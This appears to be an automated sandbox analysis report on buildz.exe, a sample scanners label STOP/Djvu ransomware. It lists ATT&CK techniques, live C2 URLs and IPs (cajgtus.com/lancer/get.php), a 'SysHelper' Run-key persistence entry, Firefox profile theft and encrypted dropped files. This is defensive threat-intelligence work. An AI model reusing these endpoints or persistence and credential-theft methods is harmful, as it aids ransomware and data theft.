          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\shield-preference-experiments.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\SiteSecurityServiceState.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\targeting.snapshot.jsonJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          2
          System Time Discovery
          1
          Taint Shared Content
          11
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts3
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          3
          Obfuscated Files or Information
          LSASS Memory1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt1
          Services File Permissions Weakness
          211
          Process Injection
          22
          Software Packing
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Screen Capture
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS24
          System Information Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Services File Permissions Weakness
          1
          Masquerading
          LSA Secrets1
          Query Registry
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials141
          Security Software Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Process Injection
          DCSync21
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Services File Permissions Weakness
          Proc Filesystem2
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526419 Sample: buildz.exe Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 52 cajgtus.com 2->52 54 api.2ip.ua 2->54 58 Multi AV Scanner detection for domain / URL 2->58 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 8 other signatures 2->64 9 buildz.exe 2->9         started        12 buildz.exe 2->12         started        14 buildz.exe 2->14         started        16 buildz.exe 2->16         started        signatures3 process4 signatures5 72 Detected unpacking (changes PE section rights) 9->72 74 Detected unpacking (overwrites its own PE header) 9->74 76 Writes a notice file (html or txt) to demand a ransom 9->76 82 2 other signatures 9->82 18 buildz.exe 1 17 9->18         started        78 Multi AV Scanner detection for dropped file 12->78 80 Injects a PE file into a foreign processes 12->80 22 buildz.exe 12->22         started        24 buildz.exe 13 14->24         started        26 buildz.exe 16->26         started        process6 dnsIp7 56 api.2ip.ua 188.114.97.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 18->56 46 C:\Users\user\AppData\Local\...\buildz.exe, PE32 18->46 dropped 48 C:\Users\user\...\buildz.exe:Zone.Identifier, ASCII 18->48 dropped 28 buildz.exe 18->28         started        31 icacls.exe 18->31         started        file8 process9 signatures10 84 Injects a PE file into a foreign processes 28->84 33 buildz.exe 1 21 28->33         started        process11 dnsIp12 50 cajgtus.com 190.219.117.240, 49711, 49869, 80 CableOndaPA Panama 33->50 38 ExplorerStartupLog...nce.etl.qual (copy), data 33->38 dropped 40 {AFBF9F1A-8EE8-4C7...0005.db.qual (copy), data 33->40 dropped 42 {AFBF9F1A-8EE8-4C7...0004.db.qual (copy), data 33->42 dropped 44 108 other malicious files 33->44 dropped 66 Tries to harvest and steal browser information (history, passwords, etc) 33->66 68 Infects executable files (exe, dll, sys, html) 33->68 70 Modifies existing user documents (likely ransomware behavior) 33->70 file13 signatures14

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          buildz.exe91%ReversingLabsWin32.Ransomware.Stop
          buildz.exe80%VirustotalBrowse
          buildz.exe100%AviraTR/AD.InstaBot.dngsb
          buildz.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe91%ReversingLabsWin32.Ransomware.Stop
          C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe82%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          cajgtus.com20%VirustotalBrowse
          api.2ip.ua9%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.openssl.org/support/faq.html0%URL Reputationsafe
          http://cajgtus.com/lancer/get.phpnal24%VirustotalBrowse
          https://api.2ip.ua/7%VirustotalBrowse
          https://api.2ip.ua/geo.jsonV3%VirustotalBrowse
          https://api.2ip.ua/geo.jsonsoft0%VirustotalBrowse
          http://www.nytimes.com/0%VirustotalBrowse
          http://www.amazon.com/0%VirustotalBrowse
          https://api.2ip.ua/geo.json/6%VirustotalBrowse
          http://www.twitter.com/0%VirustotalBrowse
          https://api.2ip.ua/Root2%VirustotalBrowse
          https://api.2ip.ua/geo.jsonm2%VirustotalBrowse
          https://api.2ip.ua/geo.json)3%VirustotalBrowse
          http://cajgtus.com/lancer/get.php20%VirustotalBrowse
          https://api.2ip.ua/geo.jsonUd9%VirustotalBrowse
          https://api.2ip.ua/geo.json7%VirustotalBrowse
          https://api.2ip.ua/geo.jsonu1%VirustotalBrowse
          https://api.2ip.ua/geo.jsont1%VirustotalBrowse
          https://api.2ip.ua/geo.json2i1%VirustotalBrowse
          https://bugzilla.mo0%VirustotalBrowse
          http://www.youtube.com/0%VirustotalBrowse
          https://api.2ip.ua/geo.jsonp3%VirustotalBrowse
          http://www.wikipedia.com/0%VirustotalBrowse
          http://www.live.com/0%VirustotalBrowse
          https://api.2ip.ua/geo.jsonI3%VirustotalBrowse
          https://api.2ip.ua/geo.json23%VirustotalBrowse
          http://www.reddit.com/0%VirustotalBrowse
          http://www.google.com/0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          cajgtus.com
          190.219.117.240
          truetrueunknown
          api.2ip.ua
          188.114.97.3
          truefalseunknown
          NameMaliciousAntivirus DetectionReputation
          https://api.2ip.ua/geo.jsonfalseunknown
          http://cajgtus.com/lancer/get.phptrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://cajgtus.com/lancer/get.phpnalbuildz.exe, 00000006.00000002.2949799439.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2947760489.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.0000000000612000.00000004.00000020.00020000.00000000.sdmptrueunknown
          http://www.nytimes.com/buildz.exe, 00000006.00000003.2317340938.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
          https://api.2ip.ua/buildz.exe, 0000000A.00000002.2344992065.0000000000747000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.0000000000862000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3295167071.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
          http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54buildz.exe, 0000000F.00000002.3295167071.00000000005D1000.00000004.00000020.00020000.00000000.sdmptrue
            unknown
            https://api.2ip.ua/geo.jsonVbuildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truehFubuildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmptrue
              unknown
              http://cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=truebuildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmptrue
                unknown
                https://api.2ip.ua/geo.jsonsoftbuildz.exe, 0000000C.00000002.2435783608.0000000000856000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://api.2ip.ua/geo.jsonCPbuildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://api.2ip.ua/geo.jsonmbuildz.exe, 00000002.00000002.2119806926.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://api.2ip.ua/geo.json/buildz.exe, 0000000A.00000003.2322599097.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://api.2ip.ua/geo.jsonUdbuildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://www.amazon.com/buildz.exe, 00000006.00000003.2314409625.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                  https://api.2ip.ua/geo.json)buildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://www.twitter.com/buildz.exe, 00000006.00000003.2319068592.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                  https://api.2ip.ua/geo.jsonJivbuildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://www.openssl.org/support/faq.htmlbuildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.2ip.ua/Rootbuildz.exe, 0000000A.00000002.2344992065.0000000000737000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errorbuildz.exe, 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      unknown
                      https://bugzilla.mo3870112724rsegmnoittet-es.sqlite.6.drfalseunknown
                      https://api.2ip.ua/geo.json;Pbuildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://api.2ip.ua/geo.jsonubuildz.exe, 00000006.00000003.2202553707.0000000000693000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://api.2ip.ua/geo.jsontbuildz.exe, 0000000C.00000002.2435783608.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://api.2ip.ua/geo.json2ibuildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.youtube.com/buildz.exe, 00000006.00000003.2321821241.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                        https://api.2ip.ua/geo.jsonpbuildz.exe, 0000000F.00000002.3295167071.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://api.2ip.ua/geo.json2buildz.exe, 00000006.00000003.2202553707.0000000000657000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.wikipedia.com/buildz.exe, 00000006.00000003.2320185574.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                        https://api.2ip.ua/geo.jsonIbuildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://www.live.com/buildz.exe, 00000006.00000003.2316168367.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                        http://www.reddit.com/buildz.exe, 00000006.00000003.2318264871.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                        http://www.google.com/buildz.exe, 00000006.00000003.2315662610.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        188.114.97.3
                        api.2ip.uaEuropean Union
                        13335CLOUDFLARENETUSfalse
                        190.219.117.240
                        cajgtus.comPanama
                        18809CableOndaPAtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1526419
                        Start date and time:2024-10-05 16:25:05 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 13s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:16
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:buildz.exe
                        Detection:MAL
                        Classification:mal100.rans.spre.troj.spyw.evad.winEXE@18/1328@4/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 28
                        • Number of non-executed functions: 192
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadFile calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • Report size getting too big, too many NtWriteFile calls found.
                        TimeTypeDescription
                        10:26:16API Interceptor1x Sleep call for process: buildz.exe modified
                        16:26:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        16:26:06Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe s>--Task
                        16:26:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        188.114.97.3QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                        • filetransfer.io/data-package/eZFzMENr/download
                        QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • filetransfer.io/data-package/MlZtCPkK/download
                        https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                        • mairie-espondeilhan.com/
                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • filetransfer.io/data-package/758bYd86/download
                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                        • filetransfer.io/data-package/58PSl7si/download
                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                        • filetransfer.io/data-package/58PSl7si/download
                        payment copy.exeGet hashmaliciousFormBookBrowse
                        • www.cc101.pro/0r21/
                        BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • cloud.dellicon.top/1000/500/
                        jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                        Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                        • www.rtprajalojago.live/7vun/
                        190.219.117.240v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                        • nwgrus.ru/tmp/index.php
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        api.2ip.uaQ3FGHfhdgU.exeGet hashmaliciousDjvuBrowse
                        • 188.114.96.3
                        Wm0uFsapfrnONF16Njxegq7s.exeGet hashmaliciousDjvuBrowse
                        • 188.114.97.3
                        66d5df681876c_file010924.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.97.3
                        tsnsd8pOvn.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.97.3
                        3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.96.3
                        C0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.96.3
                        284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.97.3
                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 188.114.96.3
                        cajgtus.comWm0uFsapfrnONF16Njxegq7s.exeGet hashmaliciousDjvuBrowse
                        • 185.18.245.58
                        66d5df681876c_file010924.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 190.220.21.28
                        3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                        • 190.13.174.94
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 109.175.29.39
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 58.151.148.90
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 109.175.29.39
                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 211.181.24.133
                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 211.181.24.133
                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 175.119.10.231
                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 181.204.98.226
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSINVOICE-COAU7230734290.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 188.114.96.3
                        f2e7fcb20146.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                        • 104.21.7.235
                        7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                        • 104.21.7.235
                        a43486128347.exeGet hashmaliciousLummaCBrowse
                        • 188.114.96.3
                        InstallSetup.exeGet hashmaliciousStealcBrowse
                        • 172.67.179.207
                        Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 162.159.140.237
                        Windows PowerShell.lnkGet hashmaliciousUnknownBrowse
                        • 104.25.234.53
                        c1#U09a6.exeGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        XWorm.exeGet hashmaliciousLummaCBrowse
                        • 188.114.96.3
                        bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                        • 104.21.86.200
                        CableOndaPAv173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                        • 190.219.117.240
                        SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elfGet hashmaliciousUnknownBrowse
                        • 190.140.175.36
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                        • 190.218.32.149
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                        • 190.218.32.149
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                        • 190.218.32.149
                        mirai.dbg.elfGet hashmaliciousMiraiBrowse
                        • 181.197.131.94
                        file.exeGet hashmaliciousSmokeLoaderBrowse
                        • 190.57.36.33
                        xd.arm7.elfGet hashmaliciousMiraiBrowse
                        • 181.197.94.18
                        arm.elfGet hashmaliciousMiraiBrowse
                        • 190.141.69.11
                        xd.x86.elfGet hashmaliciousMiraiBrowse
                        • 200.46.97.74
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19InstallSetup.exeGet hashmaliciousStealcBrowse
                        • 188.114.97.3
                        Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 188.114.97.3
                        file.dllGet hashmaliciousMatanbuchusBrowse
                        • 188.114.97.3
                        rpedido-00035.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 188.114.97.3
                        w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                        • 188.114.97.3
                        RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                        • 188.114.97.3
                        RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                        • 188.114.97.3
                        Setup.exeGet hashmaliciousUnknownBrowse
                        • 188.114.97.3
                        App_installer32_64x.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 188.114.97.3
                        setup_run.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 188.114.97.3
                        No context
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):42
                        Entropy (8bit):4.6061376606679545
                        Encrypted:false
                        SSDEEP:3:EPCUMzV18Fm4vn:EXMr8FBv
                        MD5:1F1DBEFD176B72A94075585A7B4CE66F
                        SHA1:18B0216B9F07C10B4E236FCCB2DD0C1ADF574363
                        SHA-256:A8FD1B8CD3017102DF371FA00C55FEECBD8CBF25A617CA6C5FC72E59BB4A2CED
                        SHA-512:8447F336F634998666BC35F4186BD4A98DE43A3F31E802BDF87F01F120568515765BA67839A413E83E6949DD1A29052ED230EA156DCF8AA2EE3E8718876139C3
                        Malicious:false
                        Reputation:low
                        Preview:EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):581
                        Entropy (8bit):7.542425730078469
                        Encrypted:false
                        SSDEEP:12:kx6qsCPpwUQ3bnEjVRSN+KacNVgdMIpzV6P9hJ7JKLF26Gcii9a:1qsQpwh6kScfgh36lhcRGbD
                        MD5:B532106DD920AD067F034A785820858B
                        SHA1:454116A613747EB6F03311748B17A11F8AEAC77C
                        SHA-256:89F0DD146BD6972B6A9FED5C0468C47B03949FFFB3BFBF5EA902C6D85AD842E3
                        SHA-512:932F0EFD7BD65DF1F734CA85F1C1C2E463BD9F4C42024E57CDF9FFC428421020B13B738FBDF1A5688594CF322FD905EC68F3E26F1412EC4D40FF542FBEBE1A13
                        Malicious:false
                        Reputation:low
                        Preview:2023/.."..v..(uD.0...S.r....u+.F4..-Q.[...4.#j..ct ..@......(y....+j.}...\Kr...**`6.,.7+8...*^.....!...-......t*.UcL....%.....m|.|......+."G|....A.........{.8..L..Xf.e.V..'......X....K.....V.[.%..Q..E.~.......F..;M.d...b..:v.,.:.......`4..L............o"o.....K.....j?.c]....:5.4..y].({.%.....j.g.e..5&/L..(naF..q..QBD.^....dE.8..(.z.V+2u"..'....".Z?k..,...Pk@...I.....P"...[;..o.......M.......T2..6..,B.`.....j.....B+.G2..~8......g`...T..V].{.]e...}=..>.;AH^]2..%...s...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):625
                        Entropy (8bit):7.638438877783866
                        Encrypted:false
                        SSDEEP:12:kr4NU7c1+NSKaS7J2M+zDcEjpmR+0IO9rGhouUU4a9jVLRQny426Gcii9a:i7c1+NSKayODUklO9Go/U1lRQ9GbD
                        MD5:674CE471BD2CFB83A9AAB7ABB2CC549C
                        SHA1:0D6C6834F6E597A63668599BAC0CE6F98409C88F
                        SHA-256:0EAEE65600EC1D0D642F6D29974E50FBCDD932AAECF32BD667B2FC823FBF9845
                        SHA-512:5941C8C63A9F287B4E6E89E89E777436CF05B6C98B0ACAAB253AEF150132064582588F699E908F537A2F55E7ADBA49526F138622AAD633BC68051B5A8CACA012
                        Malicious:false
                        Reputation:low
                        Preview:2023/.S.o.v..:..4...(KWS$.-^..4..N.Ud.......y....,....6..........h./.....d..V..e.;.nz_.2.].m:...X..a....K(^....pd....]f..;....Y.U......B..v.I.+.J.g$_5....t&.+...s.7.<As#6.)..g.E...(Ge.n.....9....*.\...r.O...2.n..$._.....m....&.n....N`V.-.Yt....V..{...r..9.>J.WUi4"..x.....^m.?.>.=...-}.d.i...O...--i...V#l.8.....U...g..{.8..........>E|.;.<...9..6..@A'.`..lf.g..~....<u.B.............Qz.yD;..6(L.....r....Z..t.K.K.......+.:~......V_lJ.p....qM..h..U....B.S......l.+...]B ..Xa.....&.dN).....J.~.Ul.3...k..."`..-....}..,^k..D..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):818
                        Entropy (8bit):7.702038576623489
                        Encrypted:false
                        SSDEEP:24:YKWXK0vohc04m/HQSEHe4clePviybVKSl4J6GbD:YNK0vohI2QS8e4cYPvxtKYUD
                        MD5:89C43D74A9DDCAADA9424C457DD9A7F1
                        SHA1:60AD0385C718D1634BA519A48B3717458622230F
                        SHA-256:76D769AA2A6FB5B84DBF08C05AF9F4379963CEF2BF7AB85DA410D678EE9B387A
                        SHA-512:5E7FD8B57B34B5F99E7E9D606E0F4F845F41CAFBB8268D75D654811B82D08BA6B42C2C90BFC24926ABC1692706063819E45890AB72F04933D9F01C6102C2D2BC
                        Malicious:false
                        Reputation:low
